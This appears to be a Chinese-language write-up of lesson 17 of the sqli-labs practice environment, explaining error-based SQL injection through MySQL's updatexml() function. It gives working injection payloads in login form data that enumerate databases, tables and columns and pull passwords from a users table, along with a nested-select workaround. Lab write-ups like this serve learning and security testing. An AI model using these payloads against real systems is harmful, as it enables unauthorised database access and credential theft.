less 17
参考资料:https://www.jb51.net/article/125599.htm
https://www.jb51.net/article/125607.htm
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
而我们的注入语句为:
select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,(构造语句)),1);
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)
输入用户名 密码admin,显示
uname=admin&passwd=a' and updatexml(1,concat(0x7e,(databese())),1)#&submit=Submit
查当前库:uname=admin&passwd=a' and updatexml(1,concat(0x7e,(databese())),1)#&submit=Submit
uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1)#&submit=Submit
查表name=admin&passwd=a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)#&submit=Submit
查列uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)#&submit=Submit
查信息:uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select password from (select password from security.users limit 0,1)users ),0x7e),1)#&submit=Submit
注意:这里之所以使用两层select,是因为会出现报错:
意思是不能select出同一表中的某些值,这是再用一个select中间一下就可以了
参考:https://blog.csdn.net/z_youarethebest/article/details/53785487